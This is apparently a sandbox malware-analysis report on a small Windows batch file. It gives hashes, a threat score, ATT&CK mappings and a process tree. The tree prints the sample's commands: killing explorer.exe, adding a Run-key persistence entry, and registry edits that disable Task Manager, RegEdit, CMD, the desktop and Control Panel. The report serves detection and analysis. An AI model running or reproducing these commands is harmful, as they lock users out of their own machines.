3cc90a8d47b3ef8c3325e58c9f677c22d0a6a946c73012b5a02251fdaa297dd0

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
23-07-2024 09:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

вин.bat
Size

1KB
MD5

c680bec28423eb77397704aab875640c
SHA1

9ff1f6c4537e9d05a58220cb47793e71d4536959
SHA256

3cc90a8d47b3ef8c3325e58c9f677c22d0a6a946c73012b5a02251fdaa297dd0
SHA512

db5b8219f903a95d70276ed3de1eebd9ea1f438fb25600470f0c04436e13ad30ff64148ea871bbe95fad79ba803338d7a8337155c980fe6c36dbe710cd39ede4

Score

8^/10

evasion persistence

Malware Config

Signatures

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Win32 = "C:\\Windows\\Win32.bat"	reg.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Win32.bat	cmd.exe
File created	C:\Windows\Win32.bat	cmd.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2412	taskkill.exe

Modifies registry key 1 TTPs 6 IoCs

Modify Registry

T1112

pid	Process
3220	reg.exe
2880	reg.exe
4864	reg.exe
4640	reg.exe
4984	reg.exe
3412	reg.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2412	taskkill.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 552 wrote to memory of 2948	552	cmd.exe	85
PID 552 wrote to memory of 2948	552	cmd.exe	85
PID 552 wrote to memory of 2412	552	cmd.exe	86
PID 552 wrote to memory of 2412	552	cmd.exe	86
PID 552 wrote to memory of 3220	552	cmd.exe	88
PID 552 wrote to memory of 3220	552	cmd.exe	88
PID 552 wrote to memory of 2684	552	cmd.exe	89
PID 552 wrote to memory of 2684	552	cmd.exe	89
PID 552 wrote to memory of 2880	552	cmd.exe	90
PID 552 wrote to memory of 2880	552	cmd.exe	90
PID 552 wrote to memory of 4864	552	cmd.exe	91
PID 552 wrote to memory of 4864	552	cmd.exe	91
PID 552 wrote to memory of 4640	552	cmd.exe	92
PID 552 wrote to memory of 4640	552	cmd.exe	92
PID 552 wrote to memory of 4984	552	cmd.exe	93
PID 552 wrote to memory of 4984	552	cmd.exe	93
PID 552 wrote to memory of 3412	552	cmd.exe	94
PID 552 wrote to memory of 3412	552	cmd.exe	94

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\вин.bat"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:552
- C:\Windows\system32\msg.exe
  msg by File0
  2⤵
  PID:2948
- C:\Windows\system32\taskkill.exe
  taskkill /im explorer.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2412
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
  2⤵
  - Modifies registry key
  PID:3220
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /t REG_SZ /d C:\Windows\Win32.bat /f
  2⤵
  - Adds Run key to start application
  PID:2684
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:2880
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
  2⤵
  - Disables RegEdit via registry modification
  - Modifies registry key
  PID:4864
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f
  2⤵
  - Modifies registry key
  PID:4640
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:4984
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:3412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads